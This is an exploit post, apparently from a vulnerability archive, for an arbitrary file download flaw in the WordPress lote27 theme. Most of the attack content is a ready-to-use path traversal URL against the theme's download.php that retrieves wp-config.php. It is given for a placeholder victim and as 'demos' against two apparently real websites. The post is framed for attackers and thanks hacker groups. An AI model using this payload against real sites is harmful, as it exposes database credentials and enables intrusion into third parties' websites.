WordPress lote27 theme Arbitrary File Download Vulnerability

2014.09.07

Credit: alieye

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : WordPress lote27 theme Arbitrary File Download Vulnerability
# Author : alieye
# designer Homepage : http://hyattinforma.com.br/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
# Date: 01/09/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You can download any file from your target
exploit: http://victim.com/site/wp-content/themes/lote27/download.php?download=../../../wp-config.php
Demo:
http://www.lotXe27.com.br/site/wp-content/themes/lote27/download.php?download=../../../wp-config.php
http://hyattinfXorma.com.br/site/wp-content/themes/lote27/download.php?download=../../../wp-config.php
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress lote27 theme Arbitrary File Download Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.